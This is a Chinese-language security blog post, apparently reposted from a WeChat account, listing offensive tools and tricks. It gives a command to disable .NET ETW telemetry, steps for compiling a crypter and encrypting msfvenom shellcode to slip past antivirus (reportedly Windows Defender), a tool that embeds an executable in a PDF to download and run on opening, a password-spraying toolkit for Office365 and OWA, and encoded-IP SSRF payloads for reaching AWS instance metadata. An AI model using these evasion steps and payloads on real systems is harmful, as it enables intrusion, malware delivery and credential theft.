几个工具

admin 2021年11月1日09:02:37评论189 views字数 857阅读2分51秒阅读模式

隐藏.net行为


https://blog.xpnsec.com/hiding-your-dotnet-etw/

https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/

set COMPlus_ETWEnabled=0

bypass AV,沙箱,VM


https://github.com/ReddyyZ/GhostShell

是使用以下脚本编译后加密的
https://github.com/rastating/slae/blob/master/assignment_7/crypter.c

编译

gcc -m32 -fno-stack-protector crypter.c -o 2.exe

msfvenom生成c格式后进行加密

2.exe e "key" "shellcode"

几个工具

编译出来的2.exe本身也可以当作加载器执行shellcode

2.exe x "key" "加密后的shellcode"

本身作为加载器执行免杀效果还可以,只测试了windows defender

几个工具

加密后的shellcode复制main.c中编译,这里我没有编译成功。

EvilPDF

在PDF中嵌入exe

打开pdf时跳出exe下载执行,挺老的方法了,随机使用吧。

https://github.com/thelinuxchoice/evilpdf

几个工具

SprayingToolkit


密码喷射工具

适用于Microsoft Lync,OWA,Office365

https://github.com/byt3bl33d3r/SprayingToolkit

SSRF AWS Bypasses


From:Random_Robbie

http://2852039166/latest/meta-data/

http://[::ffff:a9fe:a9fe]/latest/meta-data/

http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/

本文始发于微信公众号(关注安全技术):几个工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月1日09:02:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   几个工具https://cn-sec.com/archives/501427.html

发表评论

匿名网友 填写信息